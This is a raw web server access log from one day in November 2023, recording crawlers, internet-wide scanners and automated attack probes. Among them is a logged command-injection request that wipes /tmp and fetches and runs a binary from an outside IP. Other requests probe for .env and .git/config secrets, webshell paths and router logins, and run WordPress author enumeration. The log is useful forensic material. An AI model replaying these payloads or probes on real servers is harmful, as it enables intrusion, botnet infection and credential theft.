60.217.75.70 - - [18/Nov/2023:01:00:28 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0" 198.235.24.143 - - [18/Nov/2023:01:15:09 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 67.217.57.54 - - [18/Nov/2023:01:36:16 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 47.128.62.127 - - [18/Nov/2023:02:00:24 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 185.130.226.35 - - [18/Nov/2023:02:00:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1" 47.128.51.244 - - [18/Nov/2023:02:00:57 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Bytespider; spider-feedback@bytedance.com) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36" 202.124.227.200 - - [18/Nov/2023:02:02:56 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 67.217.57.54 - - [18/Nov/2023:02:22:29 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 203.56.198.205 - - [18/Nov/2023:02:24:50 +0100] "GET /wp-login.php HTTP/1.1" 404 294 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:24:54 +0100] "GET /?author=1 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:01 +0100] "GET /?author=2 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:01 +0100] "GET /?author=3 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:02 +0100] "GET /?author=4 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:02 +0100] "GET /?author=5 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:03 +0100] "GET /?author=6 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:03 +0100] "GET /?author=7 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:04 +0100] "GET /?author=8 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:04 +0100] "GET /?author=9 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:05 +0100] "GET /?author=10 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:05 +0100] "GET /?author=11 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:06 +0100] "GET /?author=12 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:06 +0100] "GET /?author=13 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:07 +0100] "GET /?author=14 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:08 +0100] "GET /?author=15 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:08 +0100] "GET /?author=16 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:09 +0100] "GET /?author=17 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:10 +0100] "GET /?author=18 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:11 +0100] "GET /?author=19 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 203.56.198.205 - - [18/Nov/2023:02:25:11 +0100] "GET /?author=20 HTTP/1.1" 200 274 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)" 67.217.57.54 - - [18/Nov/2023:03:05:01 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 47.128.22.172 - - [18/Nov/2023:03:46:04 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Bytespider; spider-feedback@bytedance.com) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36" 67.217.57.54 - - [18/Nov/2023:03:51:21 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 94.102.61.10 - - [18/Nov/2023:04:03:48 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 168.80.174.100 - - [18/Nov/2023:04:58:52 +0100] "GET / HTTP/1.0" 200 423 "-" "-" 168.80.174.100 - - [18/Nov/2023:04:58:54 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" 168.80.174.100 - - [18/Nov/2023:04:58:56 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" 168.80.174.100 - - [18/Nov/2023:04:58:57 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" 45.79.168.172 - - [18/Nov/2023:05:00:28 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 192.155.90.220 - - [18/Nov/2023:05:03:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 138.199.59.46 - - [18/Nov/2023:05:11:49 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:64.0) Gecko/20100101 Firefox/64.0" 196.64.64.221 - - [18/Nov/2023:05:46:56 +0100] "GET /.env HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 196.64.64.221 - - [18/Nov/2023:05:46:57 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 52.136.124.173 - - [18/Nov/2023:06:10:16 +0100] "GET /style.php?sig=rename HTTP/1.1" 404 374 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1" 198.199.92.134 - - [18/Nov/2023:06:53:44 +0100] "MGLNDD_212.69.160.11_80" 400 383 "-" "-" 183.136.225.48 - - [18/Nov/2023:06:58:57 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 172.104.11.51 - - [18/Nov/2023:06:59:33 +0100] "\x16\x03\x01" 400 383 "-" "-" 198.235.24.233 - - [18/Nov/2023:07:07:38 +0100] "\x16\x03\x01" 400 383 "-" "-" 198.235.24.233 - - [18/Nov/2023:07:07:38 +0100] "\x16\x03\x01" 400 383 "-" "-" 162.216.150.213 - - [18/Nov/2023:07:23:04 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 94.102.49.193 - - [18/Nov/2023:07:49:15 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 94.102.49.193 - - [18/Nov/2023:07:49:16 +0100] "GET /robots.txt HTTP/1.1" 404 355 "-" "-" 94.102.49.193 - - [18/Nov/2023:07:49:17 +0100] "GET /sitemap.xml HTTP/1.1" 404 356 "-" "-" 94.102.49.193 - - [18/Nov/2023:07:49:17 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 369 "-" "-" 94.102.49.193 - - [18/Nov/2023:07:49:30 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0" 205.210.31.79 - - [18/Nov/2023:08:16:03 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 185.180.143.136 - - [18/Nov/2023:08:23:35 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 198.199.71.65 - - [18/Nov/2023:08:47:57 +0100] "GET /wp-content/plugins/royal-elementor-addons/assets/js/modal-popups.min.js HTTP/1.1" 404 436 "-" "Mozilla/5.0 (Linux; Android 9; FLA-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36 OPR/59.1.2926.54067" 209.97.132.51 - - [18/Nov/2023:08:53:02 +0100] "\x16\x03\x01\x01\xfc\x01" 400 383 "-" "-" 185.36.81.33 - - [18/Nov/2023:09:18:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 205.210.31.142 - - [18/Nov/2023:09:55:58 +0100] "GET / HTTP/1.1" 200 423 "-" "-" 221.156.244.215 - - [18/Nov/2023:10:05:17 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+121.62.21.23/jaws;sh+/tmp/jaws HTTP/1.1" 404 346 "-" "Hello, world" 198.199.108.29 - - [18/Nov/2023:10:19:09 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 74.82.47.3 - - [18/Nov/2023:10:35:23 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15" 74.82.47.3 - - [18/Nov/2023:10:38:03 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0" 74.82.47.3 - - [18/Nov/2023:10:38:52 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15" 196.65.184.129 - - [18/Nov/2023:10:40:57 +0100] "GET /.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 196.65.184.129 - - [18/Nov/2023:10:40:57 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 196.65.184.129 - - [18/Nov/2023:10:51:09 +0100] "GET /.env HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 196.65.184.129 - - [18/Nov/2023:10:51:10 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 142.93.149.198 - - [18/Nov/2023:10:54:37 +0100] "GET /changelign HTTP/1.1" 404 285 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:37 +0100] "GET /infestedterran HTTP/1.1" 404 284 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:37 +0100] "GET /infestedterrna HTTP/1.1" 404 284 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:37 +0100] "GET /swarmhost HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:37 +0100] "GET /swarmhots HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:38 +0100] "GET /viper HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:38 +0100] "GET /vipre HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:38 +0100] "GET /lurker HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:38 +0100] "GET /lurkre HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:38 +0100] "GET /ravager HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:39 +0100] "GET /ravagre HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:39 +0100] "GET /dragoon HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:39 +0100] "GET /dragono HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:39 +0100] "GET /reaver HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:40 +0100] "GET /reavre HTTP/1.1" 404 281 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:40 +0100] "GET /scarab HTTP/1.1" 404 281 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:40 +0100] "GET /scarba HTTP/1.1" 404 281 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:40 +0100] "GET /darkarchon HTTP/1.1" 404 284 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:41 +0100] "GET /darkarchno HTTP/1.1" 404 284 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:41 +0100] "GET /shuttle HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:41 +0100] "GET /shuttel HTTP/1.1" 404 281 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:41 +0100] "GET /scout HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:42 +0100] "GET /scotu HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:42 +0100] "GET /interceptor HTTP/1.1" 404 284 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:42 +0100] "GET /interceptro HTTP/1.1" 404 284 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:42 +0100] "GET /arbiter HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:42 +0100] "GET /arbitre HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:43 +0100] "GET /corsair HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:43 +0100] "GET /corsari HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:43 +0100] "GET /firebat HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:43 +0100] "GET /firebta HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:44 +0100] "GET /medic HTTP/1.1" 404 281 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:44 +0100] "GET /medci HTTP/1.1" 404 281 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:44 +0100] "GET /vulture HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:44 +0100] "GET /vultuer HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:44 +0100] "GET /spidermine HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:45 +0100] "GET /spidermien HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:45 +0100] "GET /goliath HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:45 +0100] "GET /goliaht HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:45 +0100] "GET /wraith HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:46 +0100] "GET /wraiht HTTP/1.1" 404 281 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:46 +0100] "GET /dropship HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:46 +0100] "GET /dropshpi HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:46 +0100] "GET /sciencevessel HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:46 +0100] "GET /sciencevessle HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:47 +0100] "GET /valkyrie HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:47 +0100] "GET /valkyrei HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:47 +0100] "GET /defiler HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:47 +0100] "GET /defilre HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:48 +0100] "GET /scourge HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:48 +0100] "GET /scoureg HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:48 +0100] "GET /guardian HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:48 +0100] "GET /guardina HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:49 +0100] "GET /devourer HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 142.93.149.198 - - [18/Nov/2023:10:54:49 +0100] "GET /devourre HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x" 3.121.113.189 - - [18/Nov/2023:11:12:22 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 3.121.113.189 - - [18/Nov/2023:11:12:22 +0100] "GET / HTTP/1.1" 200 274 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)" 199.119.137.16 - - [18/Nov/2023:11:12:42 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 205.210.31.44 - - [18/Nov/2023:11:51:30 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 47.128.31.183 - - [18/Nov/2023:11:58:51 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 62.141.38.215 - - [18/Nov/2023:12:34:23 +0100] "GET /wp-content/plugins/wordpresscore/include.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:23 +0100] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:24 +0100] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:24 +0100] "GET /wp-content/plugins/WordPressCore-1/include.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:24 +0100] "GET /wp-content/themes/include.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /wp-content/plugins/include.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /wp-includes/widgets/include.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /wp-includes/images/include.php HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /wp-content/admin.php HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /wp-content/plugins/about.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /admin.php HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /geju.php HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /ayk.php HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 62.141.38.215 - - [18/Nov/2023:12:34:29 +0100] "GET /wp.php HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 37.46.115.16 - - [18/Nov/2023:12:40:06 +0100] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:65.0) Gecko/20100101 Firefox/65.0" 124.156.192.3 - - [18/Nov/2023:12:41:45 +0100] "GET /upload/Image/20171201/20171201091432_51390.jpg HTTP/1.1" 404 402 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" 64.62.197.153 - - [18/Nov/2023:13:01:24 +0100] "\x16\x03\x01" 400 383 "-" "-" 88.212.31.21 - - [18/Nov/2023:13:10:46 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 141.98.11.52 - - [18/Nov/2023:13:21:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 92.222.24.154 - - [18/Nov/2023:13:21:51 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 141.98.11.60 - - [18/Nov/2023:13:47:22 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 23.101.224.88 - - [18/Nov/2023:14:07:32 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 185.76.56.62 - - [18/Nov/2023:14:08:26 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) 